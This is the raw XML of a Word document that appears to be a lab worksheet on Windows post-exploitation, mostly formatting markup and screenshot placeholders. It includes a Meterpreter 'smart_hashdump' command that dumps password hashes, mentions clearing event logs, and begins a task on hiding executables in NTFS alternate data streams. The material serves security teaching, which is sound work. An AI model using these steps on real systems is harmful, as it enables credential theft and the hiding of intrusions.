              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36FB8BB0" wp14:editId="28864310">
                  <wp:extent cx="6001385" cy="53276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001385" cy="532765"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="9BBA58"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="9BBA58"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; run post/windows/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>smart_hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9084" w:type="dxa"/>
        <w:tblInd w:w="-29" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="246" w:type="dxa"/>
          <w:left w:w="29" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9480"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9084" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="9BBA58"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BD4060">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15AF5D91" wp14:editId="4C9068FE">
                  <wp:extent cx="6001385" cy="27108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001385" cy="2710815"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="9BBA58"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="9BBA58"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, command to clear the event logs…  </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9084" w:type="dxa"/>
        <w:tblInd w:w="-29" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="246" w:type="dxa"/>
          <w:left w:w="29" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9414"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9084" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="9BBA58"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BD4060">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41D3E554" wp14:editId="55C9FCC8">
                  <wp:extent cx="5876925" cy="7048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876925" cy="704850"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="9BBA58"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="9BBA58"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Task 3: Hide into file stream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="46" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Download Windows Server 2016 from Microsoft website as evaluation copy for 180 days.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Makesure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, you install it as a Desktop Experience. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Login to your Windows 2016 Server. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="89" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Check if your drive is NTFS. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8640" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8640"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00AC0DC4" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Record your EVIDENCE  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:r w:rsidR="00AC0DC4">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4008AE49" wp14:editId="4153B1FF">
                  <wp:extent cx="2638425" cy="3750487"/>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657825" cy="3778064"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>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tc>
      </w:tr>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>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tc>
      </w:tr>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>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tc>
      </w:tr>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>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tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Create a folder in C Drive (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Eg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Fdr_Hide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">).  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="88" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Copy any exe application files (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>eg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: calc.exe) file from your windows system files. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8640" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8905"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A715A6" w:rsidTr="00432D05">
        <w:trPr>
          <w:trHeight w:val="978"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00214241" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Record your EVIDENCE  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00214241">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40E7F6C6" wp14:editId="78B8D5E3">
                  <wp:extent cx="5572125" cy="2286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572125" cy="228600"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidR="00C416A1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="00214241">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00214241">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
